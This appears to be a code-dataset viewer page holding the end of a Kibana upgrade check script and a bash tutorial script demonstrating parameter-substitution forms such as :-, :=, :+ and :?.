for f in /var/www/html/nagioslogserver/www/config.js; do
  if [ ! -f "$f" ]; then
    echo "ERROR: Kibana install appears to have failed - exiting. Missing file = $f" >&2
    exit 1
  fi
done

# Things are okay
echo "Kibana upgraded OK"
| true
|
a3ddff66ee80bafd376bfcb9258bccdcf5d635ae
|
Shell
|
qjpoo/shellscript
|
/ScriptTutorials/tutorialspoint_UnixTutorial_Scripts/f036_ShellSubstitutions_VariableSubstitution.sh
|
UTF-8
| 917
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
# Tutorial: demonstrate the shell's parameter-substitution forms and how
# each one affects (or does not affect) the variable itself.
# ${var} Substitute the value of var.
# ${var:-word} If var is null or unset, word is substituted for var. The value of var does not change.
# ${var:=word} If var is null or unset, var is set to the value of word.
# ${var:?message} If var is null or unset, message is printed to standard error. This checks that variables are set correctly.
# ${var:+word} If var is set, word is substituted for var. The value of var does not change.
# var starts unset: ":-" yields the fallback text but leaves var unset.
echo ${var:-"Variable is not set"}
echo "1 - Value of var is ${var}"
# ":=" yields the fallback AND assigns it to var, so line 2 shows the text.
echo ${var:="Variable is not set"}
echo "2 - Value of var is ${var}"
unset var
# ":+" substitutes only when var IS set — prints nothing, var was just unset.
echo ${var:+"This is default value"}
echo "3 - Value of var is $var"
var="Prefix"
# Now var is set, so ":+" yields the alternate text (var itself unchanged).
echo ${var:+"This is default value"}
echo "4 - Value of var is $var"
# var is set, so ":?" simply expands to its value; no error is raised.
echo ${var:?"Print this message"}
echo "5 - Value of var is ${var}"
# ":+" with an empty word expands to an empty line.
echo ${var:+""}
unset var
echo "6 - Value of var is ${var}"
# var is unset again: ":?" prints the message to stderr and aborts the script.
echo ${var:?"Print this message"}
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.